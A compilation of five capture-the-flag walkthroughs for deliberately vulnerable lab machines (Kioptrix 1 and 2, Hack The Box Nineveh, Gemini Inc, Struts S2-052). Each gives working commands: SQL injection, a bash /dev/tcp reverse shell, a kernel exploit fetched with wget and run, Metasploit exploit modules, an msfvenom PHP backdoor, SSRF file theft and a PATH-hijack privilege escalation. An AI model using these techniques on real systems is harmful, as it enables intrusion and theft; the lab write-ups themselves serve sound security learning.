Hack The Kioptrix Level-2 (Boot2Root Challenge)

This Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.

You can Download it from here and run install in your VM.

Lets start!!

Turn on your attacking machine and use netdiscover command to scan your local network to get target IP.

So we target at 192.168.1.111 let go for its enumeration and scan open ports and protocols. With help nmap aggressive scan we have observe several open port and service running on it.

nmap -A 192.168.1.111

Since port was 80 open so we explored target IP in the web browser and notice following login page.

URL: http://192.168.1.111

Without wasting time we try following SQL injection in the given going form.

Username: 1' or '1'

Password: 1' or '1'

Great!!! We successfully login into Basic Administrative Web console where we found an empty text field for user input. Whenever I saw such type of scenario, I try to test it against command injection vulnerabilities.

Therefore we submit ;id command to enumerate UID and GID of logged user.

As result it dump apache’s UID and GID and hence by this it’s proof that this application is vulnerable to command Injection.

In a new terminal we launch netcat revere connection shell to spawn victim’s tty shell. Then submit following payload as user input inside web application.

127.0.0.1; bash -i >& /dev/tcp/192.168.1.107/8888 0>&1

As soon as above payload will get submitted you get victim’s pty shell through netcat session.

Awesome!! You can see we had access victim’s command shell inside netcat, let’s penetrate it more for root access.

id

uname -a

Then with help of Google we look for its Kernel exploit for privilege escalation and found Luckily “Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit” hence we can use 9542exploit for privilege escalation.

cd /tmp

wget https://www.exploit-db.com/download/9542 --no-check-certificate

mv 9542 shell.c

gcc shell.c

./a.out

id

whoami

B0000MM!! Here we have command shell of victim’s machine with root access.

Hack The Kioptrix Level-1 VM

This Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.

You can Download it from here and run install in your VM.

Table of content

§  Network scaning

§  Enumeration

§  Exploitation

§  Root access

Lets start!!

Turn on your attacking machine and use netdiscover command to scan your local network to get target IP.

So we target at 192.168.1.109 let go for its enumeration and scan open ports and protocols. With help nmap aggressive scan we have observe several open port and service running on it.

nmap -A 192.168.1.109

We also use Nikto for scanning vulnerability with help of following command:

nikto -h http://192.168.1.109

It was very good to see the multiple vulnerability present in this lab.

Since with help of above enumeration it becomes clear that the lab can exploit in multiple therefore without wasting time we execute following command with help of metasploit and try to comprise target’s VM machine.

This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the flaw on x86 Linux systems that do not have the noexec stack option set. NOTE: Some older versions of RedHat do not seem to be vulnerable since they apparently do not allow anonymous access to IPC.

use exploit/linux/samba/trans2open

msf exploit(linux/samba/trans2open) > set rhost 192.168.1.109

msf exploit(linux/samba/trans2open) > set payload linux/x86/shell_reverse_tcp

msf exploit(linux/samba/trans2open) > set lhost 192.168.1.107

msf exploit(linux/samba/trans2open) > exploit

B0000MM!! Here we have command shell of victim’s machine with root access.

Hack The Box : Nineveh Walkthrough

Hello friends!! Today we are going to solve another CTF challenge “Nineveh” which is categories as retired lab presented by Hack the Box for making online penetration practices. 

Level: Intermidate

Task: find user.txt and root.txt file on victim’s machine.

Since these labs are online accessible therefore they have static IP. The IP of Nineveh is 10.10.10.43 so let’s initiate with nmap port enumeration.

nmap -A 10.10.10.43

it enumerated port 80 and 443 are open.

We explored port 80 but didn’t observe any remarkable clue for next step.

So next, we use the dirb tool of kali to enumerate the directories and found some important directories such as http://10.10.10.43/department/  then went to the web browser to explore them.

dirb http://10.10.10.43 /usr/share/wordlist/dirb/big.txt

It put-up login page as shown here.

So we try the random combination of username and password. While we have enter username: admin and Password: password it gave an error “Invalid Password” hence it was sure that the username must be admin.

Then with help of burp suit we made brute force attack and use rockyou.txt file as password dictionary. Thus we obtain correct combination for login.

Username: admin

Password: 1q2w3e4r5t

Used above credential for login and get into admin console as shown.

At Notes tab we concluded that the given text of a file stored at someplace in the system entitled with ninevehNotes.txt.

After that we also we explored port 443 and observe the following web page. We also look at it view source but didn’t notice any further hint.

Therefore again use dirb tool for directory brute force attack and observe the /db directory.

dirb https://10.10.10.43 /usr/share/wordlist/dirb/big.txt

For a second time we explored above enumerated directory and observe login page for phplightAdmin v1.9.

Again we lunch brute forced the password field on /db with burp suit and got the password: password123.

By using password123 and we get inside the PHP LiteAdmin dashboard. Then with help of Google we found the trick to exploit it after reading description from exploit DB 24044.

After reading the description from exploit 24044 then we create a new database “ninevehNotes.txt.shell.php”

Here we have created a new table “Demo” and Add! Filed inside this.

Now create entry in filed 1 as shown.

Let’s create a PHP payload for injecting inside new database. We have use msfvenom command for generating PHP backdoor.

msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.25 lport=4444 -f raw

Now copy the code from * and start multi handler in a new terminal

GO to insert tab and Past above copied code inside the text filed given for Value.

At last you will notice /var/tmp/ ninevehNotes.txt.shell.php is the Path for your database.

If you remember, we had already access admin console and observed a tab for Notes, use it to execute your backdoor.

http://10.10.10.43/department/manage.php?notes=/var/tmp/ninevehNotes.txt.shell.php

Meanwhile, return to the Metasploit terminal and wait for the metepreter session by exploiting multi handler.

msf use exploit/multi/handler

msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp

msf exploit(multi/handler) set lhost 10.10.14.25

msf exploit(multi/handler) set lport 4444

msf exploit(multi/handler) exploit

From given below image you can observe Meterpreter session 1. But the task is not finished yet, still, we need to penetrate more for privilege escalation.

meterpreter > sysinfo

meterpreter > cd /home

meterpreter > ls

meterpreter > cd amrois

meterpreter >ls

meterpreter > cat user.txt

After doing a little bit enumeration we notice a directory report is owned by the user amrois and these reports were being continuously generated by chkrootkit in every minute.

With help of Google we came know that metasploit contains an exploit for chkrootkit exploitation. After enter following command as shown in given image to load exploit/unix/local/chkrootkit module then set session 1and arbitrary lport such as 4545 and run the module.

This will give another session, as you can see we have spawned command shell of target’s machine. Now if you will check uid by typing id it will show uid=0 as root.

id

cd /root

And to see the list of files in /root type:

ls -lsa

In the list you will see that there is a text file and to read that file type :

cat root.txt

Congrats!! We hit Goal finished both task and at end obtain the root access.

Hack The Gemini Inc (CTF Challenge)

Gemini Inc has contacted you to perform a penetration testing on one of their internal systems. This system has a web application that is meant for employees to export their profile to a PDF. Identify any vulnerabilities possible with the goal of complete system compromise with root privilege. To demonstrate the level of access obtained, please provide the content of flag.txt located in the root directory as proof.

Download it from here.

Penetrating Methodologies

·         Scanning (NMAP)

·         Abusing web application for export injection vulnerability

·         Exploit web application via html iframe

·         Steal SSH RSA file

·         Access tty shell through ssh login

·         Enumerate file having SUID bit

·         Privilege Escalation

·         Get root shell

·         Complete the task and capture the Flag.txt

Let’s GO000!!!

To scan our target IP we will use aggressive scan (-A)

nmap -p- -A 192.168.1.103 --open

As result, it figures out port 22 and 80 was open. Also found a directory /test2. When explored target IP through the web browser it put up following web page as discussed.

Then we explored /test2 where we read following message for admin and also look after at the URL given here.

Then at login form, we tried the hit-try method for login into the admin console and luckily at 5^th attempt we get successful login when we submit following credential.

Username: admin

Password: password123

After login into admin console successfully we check available action that can be performed by the administrator and here it shows following actions.

§  Edit profile

§  Export profile

So we execute export profile to observe what is in actually it is exporting but could not figure out from its output as shown in below image, therefore, we decided to capture its request.

Further, with help of burp suit, we try to capture its browser request and sent the Intercepted request into the repeater and here I saw the export script possibly gave us the user profile page admin in PDF format by a tool named wkhtmltopdf.

Security breaches if the web application does not filter the user’s input, the server is exposed to several loopholes  Because the most common exposures on the web, is the possibility to download an arbitrary file from a server. This state establishes a critical security issue, as it provides an attacker the ability to download delicate information from the server. For example download /etc/passwd file and so on.

We can abuse the wkhtmltopdf and try to download delicate information. Here we have written the following code for the index.php script that redirects to the any requested file. 

In order to transfer it into victim's machine, therefore, we launch PHP server for file transfer.

php -S 0.0.0.0:4444

We got a hint for export injection from this source: https://securityonline.info/export-injection-new-server-side-vulnerability/  and its bases we proceed for following steps.

Now go with Action -> edit profile

Then injecting the following HTML code inside the text filed given for the Display name 

Now go with Action -> export profile

TERRIFIC!!!! It stands on our expectation and we have /etc/passwd file in front of us.  here we can clearly observe UID GID 1000 for user: gemini1.  

From nmap scan result we had seen there was a hint for SSH RSA key and we also knew the first username of this VM, therefore let’s try to export RSA file. 

Now go with Action -> edit profile

Then injecting the following HTML code inside the text filed given for the Display name 

Now go with Action -> export profile

Feeling Incredible J  After observing the following result, download it quickly.

With help of downloaded RSA file connect to victim's VM via ssh.

ssh -i login_rsa gemini1@192.168.1.103

Then without wasting your time search for the file having SUID or 4000 permission with help of Find command for post exploitation.

find / -perm -u=s -type f 2>/dev/null

Here we can also observe an interesting file/usr/bin/listinfo having suid permissions. And after exploring this file we notice it probably running natstat and date. Hence we can escalate privilege by exploiting environment PATH Variable, you can take help of our article from here to know more about it. 

cd /tmp

echo “/bin/sh” > date

chmod 777 date

echo $PATH

export PATH=/tmp:PATH

/usr/bin/listinfo

As you can observe after that we execute id command and accomplished by root id.

Now let's finished this task by capturing the flag.txt flag from inside root directory.

cd root

ls

cat flag.txt

Hack The Vulnhub Pentester Lab: S2-052

Hello friend!! Today we are going to exploit another VM lab which is designed by Pentester Lab covers the exploitation of the Struts S2-052 vulnerability. The REST Plugin is using a XStreamHandler with an instance of XStream for deserialization without any type filtering and this can lead to Remote Code Execution when deserializing XML payloads.

Source: https://cwiki.apache.org/confluence/display/WW/S2-052

Table of content

§  Introduction

§  Download VM

§  Enumeration (Nmap)

§  Surfing Port 80

§  Exploit the target (Metasploit)

Let’s Exploit!!

Download it from here and run this VM. Then check its network configuration through ifconfig command.

Since target belongs to 192.168.1.103 network, let’s go for its enumeration with help of nmap following command to identify running service and version.

nmap -A 192.168.1.103

From nmap scanning result we enumerated following details:

Http-server-header: Apache-coyote/1.1

Http-title: orders

Requested resource: /order.xhtml

So when we have explored /order.xhtml through the web browser it put up following webpage.

Further, we explore user Bob it brings us inside order3 web page.

Since the author has already declared that is vm is vulnerable to the Struts S2-052 therefore with the help of following module of metasploit we can directly exploit it to obtain command shell of target vm.

msf > use exploit/multi/http/struts2_rest_xstream

msf exploit(multi/http/struts2_rest_xstream) > set rhost 192.168.1.103

msf exploit(multi/http/struts2_rest_xstream) > set rport 80

msf exploit(multi/http/struts2_rest_xstream) > set TARGETURI /orders/3

msf exploit(multi/http/struts2_rest_xstream) > exploit

BOOOOOOM!!! Here we owned the command shell of victim’s vm.